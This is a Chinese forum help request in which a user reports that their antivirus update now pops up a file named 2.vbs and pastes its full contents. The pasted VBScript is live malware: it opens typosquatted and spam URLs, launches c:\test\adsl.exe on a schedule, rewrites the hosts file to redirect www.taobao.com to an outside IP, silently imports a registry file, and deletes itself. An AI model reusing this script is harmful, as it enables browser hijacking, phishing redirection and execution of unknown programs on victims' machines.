昨天瑞星突然无法正常升级,点击升级就跳出一名为2.vbs的记事本文件。重新安装了瑞星还是有,在网上也下载了修复软件都不行。请问该如何解决,万分感谢!!该文件内容如下:
On Error Resume Next
Set objShell = CreateObject("Wscript.Shell")
wscript.sleep 920000 '
objShell.Run("
http://www.kaers2009.net")
wscript.sleep 2320000 '
objShell.Run("
http://www.goog1e.hk")
wscript.sleep 2320000 '
objShell.Run("
http://www.kaers01.cn")
sProgramme = "c:\test\\adsl.exe"
sRunTime = "10:30"
aTime = Split(sRunTime, ":")
iHour = CInt(aTime(0))
iMinute = CInt(aTime(1))
Do While True
If (Hour(Now) = iHour) And (Minute(Now) = iMinute) Then
Set oShell = CreateObject("WScript.Shell")
oShell.Run sProgramme, 1, False
Set oShell = Nothing
Exit Do
End If
WSH.Sleep 1000
Loop
sProgramme = "c:\test\\adsl.exe"
sRunTime = "17:14"
aTime = Split(sRunTime, ":")
iHour = CInt(aTime(0))
iMinute = CInt(aTime(1))
Do While True
If (Hour(Now) = iHour) And (Minute(Now) = iMinute) Then
Set oShell = CreateObject("WScript.Shell")
oShell.Run sProgramme, 1, False
Set oShell = Nothing
Exit Do
End If
WSH.Sleep 1000
Loop
wscript.sleep 3000 '
Set wshshell=wscript.CreateObject("WScript.Shell")
wshshell.run "cmd /c echo. >> C:\WINDOWS\system32\drivers\etc\hosts",0
WScript.Sleep(500)
wshshell.run "cmd /c echo 122.70.153.179
www.taobao.com >> C:\WINDOWS\system32\drivers\etc\hosts",0
Dim sProgramme, sRunTime, aTime, iHour, iMinute, oShell
wscript.sleep 3000 '
objShell.Run("regedit /s c:\test\ie.reg")
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile(WScript.ScriptName)
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)